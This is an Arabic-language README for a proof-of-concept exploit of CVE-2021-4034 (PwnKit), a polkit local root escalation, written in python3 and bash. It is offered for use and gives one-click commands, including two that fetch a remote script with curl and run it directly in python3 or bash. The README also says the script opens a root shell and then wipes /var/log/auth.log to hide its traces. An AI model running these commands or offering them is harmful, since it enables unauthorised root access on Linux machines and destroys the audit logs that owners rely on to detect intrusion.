
# PoC بلغة python3 و bash لثغرة CVE-2021-4034 من إعداد Kim Schulz
██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz
هذا هو PoC بسيط لخطأ Polkit المكتشف حديثًا والمسمى PwnKit.
لقد قمت بإنشائه كنص برمجي بلغة bash وأيضًا بلغة python3 - فقط من أجل المتعة.
المشكلة بسيطة جدًا في استغلالها ولكن لها عواقب وخيمة حيث أنها ستمنح بسهولة صلاحيات الجذر (root) على معظم أجهزة Linux حيث يمتلك المهاجم وصولًا كمستخدم محلي.
هذه النصوص البرمجية تُنفذ بضغطة واحدة، لذا ببساطة قم بتشغيل:
python3 pkwner.py
أو
bash pkwner.sh
يمكنك أيضًا تشغيلها مباشرة من خادم ويب (مثل مستودع GitHub هذا) عبر:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
أو
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
في كلتا الحالتين يجب أن يبدو الأمر شيئًا كهذا:
و

سينشئ النص البرمجي بعض الملفات والمجلدات ولكنه سينظف بعد نفسه عند فتح قشرة الجذر (root shell) - وسينظف حتى ملف /var/log/auth.log (ولماذا لا).